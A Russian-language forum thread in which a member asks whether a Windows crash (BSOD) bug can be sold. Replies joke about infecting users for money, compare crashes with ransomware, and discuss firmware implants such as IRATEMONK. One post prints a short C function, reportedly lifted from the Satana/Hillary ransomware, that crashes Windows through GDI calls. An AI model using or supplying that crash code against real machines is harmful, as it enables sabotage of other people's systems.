Можно ли заработать на BSOD?

Тема в разделе "WASM.COMMERCE", создана пользователем ant, 26 окт 2017.

  1. ant

    ant Member

    Публикаций:
    0
    Регистрация:
    19 мар 2008
    Сообщения:
    118
    Извиняюсь за дурацкий вопрос.
    Я случайно обнаружил возможность устроить крах системы из Ring 3. Требуются права администратора.
    Точно работает на Windows 7 Professional AMD64 7601 и на Windows 10 Pro AMD64 15063.
    Можно ли кому-то это продать? Работы мало, деньги нужны.

    Кроме того, нарыл альтернативу RegReplaceKey, но оно не работает под Avast, например. Зато проскакиевает у такого параноика, как 360Total.


    Не судите строго. :)
     
  2. yazichnik

    yazichnik New Member

    Публикаций:
    0
    Регистрация:
    30 авг 2008
    Сообщения:
    12
    Привет, есть Атличная идея, инфектим юзеров, они ловят BSODы без перерыва... и тут бабло начинает просто наваливаться, прямо в биткоинах!!!
    Тут главное не пропустить когда биты навалят...

    Сорри за флуд, просто не удержался:)
     
  3. yashechka

    yashechka Ростовский фанат Нарвахи

    Публикаций:
    90
    Регистрация:
    2 янв 2012
    Сообщения:
    1.449
    Адрес:
    Россия
    Так делайте ПОК, выкладывайте ролик, только проверьте, что это действительно никому неизвестный баг.
     
  4. TermoSINteZ

    TermoSINteZ Синоби даоса Команда форума

    Публикаций:
    2
    Регистрация:
    11 июн 2004
    Сообщения:
    3.552
    Адрес:
    Russia
    Никому не нужно. Забейте

    тут ребята без прав админа BSOD на win10 вызывали, практически одной строчкой кода.
    https://twitter.com/taviso/status/917886787627843584
     
    yashechka нравится это.
  5. RET

    RET Well-Known Member

    Публикаций:
    17
    Регистрация:
    5 янв 2008
    Сообщения:
    789
    Адрес:
    Jabber: darksys@sj.ms
    Через шадов все что угодно :) Прав не надо достаточно буфер переполнить. Где то я выкладывал на старом форуме, там 2 строки кода. А вот:
     
    Последнее редактирование модератором: 4 дек 2017
  6. Indy_

    Indy_ Well-Known Member

    Публикаций:
    4
    Регистрация:
    29 апр 2011
    Сообщения:
    4.775
    RET,

    Вот одна из новостей по OP: https://cxsecurity.com/issue/WLB-2017110160

    Это видимо не корректная case-конструкция в одном из системных классах. Впрочем не важен механизм атаки, главное что он подчиняется общим правилам защиты(функция детекта) - внесение указателя в поток данных и выборка по указателю(dereference under influence"). Это может быть обнаружено и блокировано общим способом на уровне железа.

    И что за фигня с хайдом:

    > Скрытое содержимое, Вам необходимо иметь сообщений: 200, а сейчас у Вас сообщений:1207.

    Почините или не используйте.
     
  7. unc1e

    unc1e Active Member

    Публикаций:
    2
    Регистрация:
    28 июл 2017
    Сообщения:
    287
    yazichnik,
    Это плохая практика: bsod`ы пропадут после переустановки системы (файлы при этом совершенно спокойно можно восстановить, если загрузиться с флешки). А вот в случае шифрования - информация потеряна.
     
  8. RET

    RET Well-Known Member

    Публикаций:
    17
    Регистрация:
    5 янв 2008
    Сообщения:
    789
    Адрес:
    Jabber: darksys@sj.ms
    Та Вы чел походу школоло.
    Читайте тут
    https://www.google.ru/search?client=opera&q=рансом+satana&sourceid=opera&ie=UTF-8&oe=UTF-8
    А вообще, если хотите заработать и не СИДЕТЬ - то пишите легальный софт, если умеете вообще что то.
     
  9. RET

    RET Well-Known Member

    Публикаций:
    17
    Регистрация:
    5 янв 2008
    Сообщения:
    789
    Адрес:
    Jabber: darksys@sj.ms
    Indy_, да там косяк на косяке. Согласен. Да с хайдами тут какой то трабл. Дам из Cатаны/Хиллари кусок про бсод в открытую:
    Код (Text):
    1. static void KillWindows()
    2. {
    3.     HDC dc = CreateCompatibleDC (NULL);
    4.     SetLayout (dc, LAYOUT_RTL);
    5.     ScaleWindowExtEx (dc, -2147483647 - 1, -1, 1, 1, NULL);
    6. }
     
  10. unc1e

    unc1e Active Member

    Публикаций:
    2
    Регистрация:
    28 июл 2017
    Сообщения:
    287
  11. RET

    RET Well-Known Member

    Публикаций:
    17
    Регистрация:
    5 янв 2008
    Сообщения:
    789
    Адрес:
    Jabber: darksys@sj.ms
    unc1e, Это не важно, да
     
  12. RET

    RET Well-Known Member

    Публикаций:
    17
    Регистрация:
    5 янв 2008
    Сообщения:
    789
    Адрес:
    Jabber: darksys@sj.ms
    чушь, в биос нынче прописать коня не реально
     
  13. Minzdrav

    Minzdrav Well-Known Member

    Публикаций:
    0
    Регистрация:
    21 мар 2017
    Сообщения:
    1.082
    Я знаю случай когда Линукс поломал БИОС. Зарубил просто в усмерть топором.
    На ноуте Футжитсу (за_бись ноуты кстате, японо-нимецко-китайские). Надо было
    или перепрошивать БИОС, или новую материнку заказывать.
    Потом выяснилось что это была недоработка одной серии ноутбуков.
    Их на заводе даже поленились обкатать с Линуксом. (Чудно да)?

    А проблема была в том, что после установки какой-то там Убунты,
    доступа к БИОСУ больше небыло. Тоесть ОС загружалась, и ей
    пользуйся на здоровье. Но другую уже не поставишь.
    Убунта форева. Один ноут - одна ОС.
     
    Последнее редактирование: 4 дек 2017
  14. RET

    RET Well-Known Member

    Публикаций:
    17
    Регистрация:
    5 янв 2008
    Сообщения:
    789
    Адрес:
    Jabber: darksys@sj.ms
    да можно, в принципе на старом железе и сейчас, не видно было проблем
     
  15. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    есть конечно же :) но весь такой софт аппаратно-зависимый.. большая часть ресерча от независимых исследователей работает только в лабораторных условиях; в целом если бы оно имело финансирование, охват и масштабы были бы внушительными.
    несколько лет тому назад был популярен имплант IRATEMONK от АНБ. по сути своей это была "кастомная фирмварь" которая зашивалась посредством ata команд в hdd. работало оно путем подмены MBR/VBR(IPL) в момент инициализации железа, до загрузки ОС. это же позволяло выживать переустановку ос и прочие губительные ситуации. но все это было актуально во времена легаси, с приходом uefi и secureboot оно уже неактуально. впрочем АНБ на месте не сидит и из утекших доков понятно что атаковать теперь уже хотят посредством ssd (в доке не указывается что это ssd nvme, но у меня такой вывод ввиду того, что именно nvme сидит на шине pci-e и имеет прямой доступ на чтение запись в ram):
    [​IMG]

    переживать переустановку ОС можно из любых аппаратных частей PC, где можно врубиться и перехватить управление используя инфект прошивки :)